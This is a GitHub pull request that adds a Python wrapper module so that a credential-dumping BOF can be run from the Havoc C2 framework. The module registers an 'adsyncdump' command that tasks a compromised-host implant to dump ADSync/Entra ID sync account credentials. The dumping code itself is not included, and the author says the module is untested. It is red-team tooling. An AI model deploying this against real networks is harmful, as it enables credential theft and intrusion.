### PR TITLE
Add support for Havoc C2

### DIFF
--- a/adsyncdump.py
+++ b/adsyncdump.py
@@ -1,15 +1,12 @@
 from havoc import Demon, RegisterCommand
 
-def adsyncdump(demonID, *param):
-    TaskID : str    = None
-    demon  : Demon  = None
 
-    demon  = Demon( demonID )
-
+def adsyncdump(demon_id, *param):
+    demon = Demon(demon_id)
     TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
-    
-    demon.InlineExecute( TaskID, "go", f"adsyncdump.{demon.ProcessArch}.o", b'', False )
+    demon.InlineExecute(TaskID, "go", f"adsyncdump.{demon.ProcessArch}.o", b"", False)
 
     return TaskID
 
-RegisterCommand( adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "" )
+
+RegisterCommand(adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "")

--- a/adsyncdump.py
+++ b/adsyncdump.py
@@ -2,8 +2,9 @@ from havoc import Demon, RegisterCommand
 
 
 def adsyncdump(demon_id, *param):
+    """Tasks the demon to dump credentials of the Entra ID sync account"""
     demon = Demon(demon_id)
-    task_id = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
+    task_id = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials")
     demon.InlineExecute(task_id, "go", f"adsyncdump.{demon.ProcessArch}.o", b"", False)
 
     return task_id

--- a/adsyncdump.py
+++ b/adsyncdump.py
@@ -3,10 +3,10 @@ from havoc import Demon, RegisterCommand
 
 def adsyncdump(demon_id, *param):
     demon = Demon(demon_id)
-    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
-    demon.InlineExecute(TaskID, "go", f"adsyncdump.{demon.ProcessArch}.o", b"", False)
+    task_id = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
+    demon.InlineExecute(task_id, "go", f"adsyncdump.{demon.ProcessArch}.o", b"", False)
 
-    return TaskID
+    return task_id
 
 
 RegisterCommand(adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "")

--- a/adsyncdump.py
+++ b/adsyncdump.py
@@ -1,0 +1,15 @@
+from havoc import Demon, RegisterCommand
+
+def adsyncdump(demonID, *param):
+    TaskID : str    = None
+    demon  : Demon  = None
+
+    demon  = Demon( demonID )
+
+    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
+    
+    demon.InlineExecute( TaskID, "go", f"adsyncdump.{demon.ProcessArch}.o", b'', False )
+
+    return TaskID
+
+RegisterCommand( adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "" )


### PR DESCRIPTION
This PR adds support for this BOF the easily be loaded into Havoc C2. Havoc uses Python for this. More examples can be found here https://github.com/HavocFramework/Modules/

I don't have a setup with an ADSync account, but it should work!

<img width="694" height="210" alt="asdf" src="https://github.com/user-attachments/assets/f27c56d8-ca5c-4a2c-9ca6-70d494d17fe5" />
